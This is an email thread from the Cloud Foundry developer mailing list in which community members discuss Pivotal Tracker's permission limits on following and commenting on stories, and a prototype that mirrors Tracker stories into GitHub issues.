Will let you know if I get a reply.

Regards,
Dies Koper
Cloud Foundry CLI PM

-----Original Message-----
From: Voelz, Marco [mailto:marco.voelz(a)sap.com]
Sent: Monday, November 23, 2015 8:00 PM
To: Discussions about Cloud Foundry projects and the system overall.
Subject: [cf-dev] Re: FW: issue tracker permissions

Thanks Jan for bringing that up, I've had similar problems with that
as well. Any ideas on how to solve this? Is this a feature that the tracker
team actively works on?
Hitting cmd+r every few days on the same stories doesn't seem like
the best way to stay informed about your favorite features.

Warm regards
Marco



On 19/11/15 09:23, "Sievers, Jan" <jan.sievers(a)sap.com> wrote:

>>Hi,
>>
>>I was trying to watch a story I am interested in
>>https://www.pivotaltracker.com/n/projects/892938/stories/105493826
>>
>>
>>I do have an account but it seems I don't have permissions to watch
nor to comment.
>>
>>Is there something I missed?
>>
>>Regards
>>Jan
>>





































































--
Sent from Jeff Dean's printf() mobile console

Dear Guillaume,

Thanks for your efforts in this direction. As I already stated before, it
is really a pain that you are not able to follow stories or comment when
not being a member in a Pivotaltracker project. However, github issues
aren’t more than a crutch, probably not even a good one.

For example, GH issues cannot be ordered. They are in the order of
creation, priorization is not visible. Therefore, if you look e.g. at the
BOSH mirror [1], there are a bunch of “unstarted” and “unscheduled” issues,
the first “started” one comes on page 2. For bugs, it gets more confusing.
Most people have the github bot activated, which creates a PT story for
each GH issue created. This is already confusing, because you have two
places where potentially updates to this bug could be located in, and
nobody knows where to look. Add in the mirroring, and now you have three
places, see an example for the buildpacks [2]. All of this is not your
fault, it is a restriction on how GH deals with issues and the fact that
we’re distributing information over more than one place.

While I appreciate your efforts and time spent on this: I strongly feel
that is an issue that can only be solved by one of two options:
• The Pivotaltracker team implementing the necessary functionality
• Migrating to a different tracker

I’m trying all I can to push for the first option by talking to Dan and
Lisa, but other features seem to be more important to the PT team. In
November, it has been a year since I asked for this, so my confidence isn’t
very high that it is going to happen at all. For me that just means option
two is getting more and more realistic every day.

Warm regards
Marco

[1] https://github.com/cf-tm-bot/bosh/issues
[2] https://github.com/cloudfoundry/staticfile-buildpack/issues/85



-----Original Message-----
From: Guillaume Berche <bercheg(a)gmail.com>
Date: Saturday, 24 September 2016 at 12:29
To: "Discussions about Cloud Foundry projects and the system overall." <
cf-dev(a)lists.cloudfoundry.org>
Cc: Chip Childers <cchilders(a)cloudfoundry.org>, "cholick(a)gmail.com" <
cholick(a)gmail.com>, Dan Podsedly <dpodsedly(a)pivotal.io>, Lisa Doan <
ldoan(a)pivotal.io>, "Voelz, Marco" <marco.voelz(a)sap.com>
Subject: Re: [cf-dev] Re: FW: issue tracker permissions

Hi,


The mirroring of foundation projects is around 60% complete. See [5]
for more detailed coverage. This should enable community members to watch
the most active foundation backlogs. I received no notifications of
negative side effects of this mirroring so
far. I'll proceed with mirroring the remaining projects in the next
days/weeks.

There are interesting next steps that could be tackled, such as
enabling commenting on the backlogs, or searching across all foundation
backlog history, see [3]. Let me know if you have interests in discussing
these next steps and current challenges faced by
the mirroring process. The upcoming Frankfurt cfsummit unconference
on monday might be a good place for this, I'd propose a subject if I
receive some interest.


Thanks,


Guillaume.






Guillaume.




On Mon, Sep 5, 2016 at 10:21 PM, Guillaume Berche
<bercheg(a)gmail.com> wrote:

Hi,


We have prototyped at Orange an automatic mirroring of Pivotal Tracker
(PT) stories into github issues. See pivotaltrackermirror at [1], and the
experimental mirror of the buildpack tracker at [2]. I'd like to thanks the
buildpacks team for accepting to join
this experiment and providing us with feedback in the past few weeks.

We hope this could bring the following benefits to the CF community:

1. allow use of the
watching notifications <https://help.github.com/
articles/about-notifications/#types-of-notifications> github feature to
track progress on public pivotal trackers projects: all stories or selected
stories of interest.
2. allow use of
github search features <https://help.github.com/
articles/searching-github> to search Pivotal Tracker content (e.g.
accross multiple mirrored PT projects, or along with other github
repositories hosting the associated code)
3. allow use of
github @mentions <https://help.github.com/articles/basic-writing-and-
formatting-syntax/#mentioning-users-and-teams> to contact github accounts
associated with PT public projects contributors, in the context with a
specific mirrored story
4. mirrored content becomes discoverable: search engines index it,
making it easier to find mirrored PT content such as a stack trace

This is still experimental work. We would like to hear community
feedback about this initiative (how is it useful?), as well as core
contributor teams (are there unexpected side-effects that need to be
handled beyond what we fixed so far [3]?) Do you have
suggestions for enhancements: can you comment/vote/improve in [3]?


Our plan is to progressively extend this experiment to more trackers
listed in [5] (in a rate of a few projects per week). Please report issues
on [3] if you observe negative side effects, or reply to this email if you
have concerns about this mirroring.



There still a fair amount of work ahead to convert this experiment
into a stable tool, and opportunities to provide some new cool features to
the community. Contributions are welcome :-)



Thanks,


Guillaume.



ps: I also recently noticed a PT slack integration [4] that would also
cover use-case #1 (get notifications for all stories in a tracker). I'm not
yet sure what it takes to add it to a given channel.


[1]
https://github.com/orange-cloudfoundry/pivotaltrackermirror <
https://github.com/orange-cloudfoundry/pivotaltrackermirror>
[2] https://github.com/cf-tm-bot/buildpacks
[3]
https://github.com/orange-cloudfoundry/pivotaltrackermirror/issues <
https://github.com/orange-cloudfoundry/pivotaltrackermirror/issues>
[4]
https://cloudfoundry.slack.com/apps/A0F82E7H8-pivotal-tracker <
https://cloudfoundry.slack.com/apps/A0F82E7H8-pivotal-tracker>
[5]
https://github.com/cloudfoundry-community/cf-docs-contrib/wiki <
https://github.com/cloudfoundry-community/cf-docs-contrib/wiki>





Guillaume.




On Sun, May 29, 2016 at 8:05 PM, John Wong
<gokoproject(a)gmail.com> wrote:

Just an idea... Is there a feature in Tracker to always cc
someone/some email address? For non security and non confidential stories
we can Cc this email address automatically which will post to a google
group and a thread will be built as comment is added.
This at least allow a read-only mirror.


Just a thought...


On Sunday, May 29, 2016, Voelz, Marco <marco.voelz(a)sap.com> wrote:

Dear Dan, dear Lisa, dear Chip, dear community,

sorry for digging out this old issue again and again. If you are just
tuning in, here is the situation
·
I like Pivotal Tracker as a product
·
I have to use Tracker for my daily work, as it is currently mandatory
for all CFF projects and all of them use it
·
The restrictions in pivotal tracker make it hard to impossible to do
the daily stuff you want to do within a large open-source community.

After initially bringing this up in November last year, here are a few
of the problems I addressed with Dan in a hangout session in February:
·
To follow stories in a project you need to be a member of that
project. Therefore, you cannot track progress on stories in other projects.
·
To comment on stories, the same restrictions as above apply

It has been 3 months since Dan and I talked, I’ve checked back every 4
weeks with him and what I’ve heard so far is ideas. I haven’t seen a
prototype, any specifics on the current state,
any planning details. It’s not like I’m demanding this feature should
be done by now – I just want to know what is going on.

I have to say I am very unhappy in how this topic is treated. From my
point of view, it seems like there is a huge lack of transparency and
feedback. Please, let me know what’s going on.
I don’t want to switch to a different tracker, such as e.g. trello,
but if the requirements of a large open-source community aren’t heard, then
I don’t know what else to do about this.

Warm regards
Marco

PS: What about a public tracker backlog in tracker, so people can
follow their favorite feature stories and see where they are in the
planning and when they’re done?


On 16/01/16 13:09, "Voelz, Marco" <marco.voelz(a)sap.com> wrote:





Dear all,



it has now been more than a month since I sent my feedback concerning
this feature to the tracker team – I haven't received any reaction to it.

@Chip:
Is there an option you could weigh in for this from the Foundation
perspective? That would be great!



Sorry for being so stubborn about this, but in my opinion this is a
crucial feature for a bug tracker/backlog which is used in an open-source
product. I know that all the people
working directly at pivotal don't feel the pain, because they can
either talk directly to everyone in person or have the necessary rights to
comment/follow in the other projects, but for everyone else this is really,
really a problem.



Warm regards

Marco



On 09/12/15 21:20, "Voelz, Marco" <marco.voelz(a)sap.com> wrote:




Thanks for pointing me to this link. However, we seem to have the same
problem here: This seems like a fire-and-forget solution. Where does this
item go? How can I send it to
other people and have them +1 it, like it, follow it, favorite it or
whatever is necessary to indicate that there is more than 1 person wanting
this feature?




Thanks and warm regards

Marco



On 09/12/15 20:01, "Amit Gupta" <agupta(a)pivotal.io> wrote:




If you're logged in to Tracker, there's a "Help & Updates" link at the
top, and one of the options is Provide Feedback.


On Wed, Dec 9, 2015 at 10:59 AM, Voelz, Marco <marco.voelz(a)sap.com>
wrote:

I'd happily submit a feature request to build up some visible demand
for this – could you point me to the right channel here?




Thanks and warm regards

Marco



On 08/12/15 23:01, "Dieu Cao" <dcao(a)pivotal.io> wrote:





Unfortunately in order to follow a story in tracker, the minimum
required level is "member" which allows you to create/comment/delete
stories in tracker.

I would suggest submitting a request to the pivotal tracker team to
help build up evidence that this is a feature that people want.



-Dieu



On Tue, Dec 8, 2015 at 12:49 PM, Matt Cholick <cholick(a)gmail.com>
wrote:

Sorry to resurrect an older thread, but I wanted to chime in that this
is a frustration I have too. There are several stories in the various CF
teams public backlogs that I'd
like to keep track of.


Is it possible for community members to get enough permissions on our
tracker accounts to add ourselves to the follow list?



-Matt



On Mon, Nov 23, 2015 at 3:10 AM, Koper, Dies <
diesk(a)fast.au.fujitsu.com> wrote:

Hi Marco, Jan,

I sent an email to Tracker support about that last week because we
were hoping to close CLI feature requests on GH and let people follow the
stories on Tracker. Support confirmed that people need to have R/W access
to a project to do that.
I have just replied to ask if they'd consider an enhancement. Not sure
what the proper channel would be to get such a story prioritized.
Will let you know if I get a reply.

Regards,
Dies Koper
Cloud Foundry CLI PM

-----Original Message-----
From: Voelz, Marco [mailto:marco.voelz(a)sap.com]
Sent: Monday, November 23, 2015 8:00 PM
To: Discussions about Cloud Foundry projects and the system overall.
Subject: [cf-dev] Re: FW: issue tracker permissions

Thanks Jan for bringing that up, I've had similar problems with that
as well. Any ideas on how to solve this? Is this a feature that the tracker
team actively works on?
Hitting cmd+r every few days on the same stories doesn't seem like the
best way to stay informed about your favorite features.

Warm regards
Marco



On 19/11/15 09:23, "Sievers, Jan" <jan.sievers(a)sap.com> wrote:

>>Hi,
>>
>>I was trying to watch a story I am interested in
>>https://www.pivotaltracker.com/n/projects/892938/stories/105493826
>>
>>
>>I do have an account but it seems I don't have permissions to watch
nor to comment.
>>
>>Is there something I missed?
>>
>>Regards
>>Jan
>>





































































--
Sent from Jeff Dean's printf() mobile console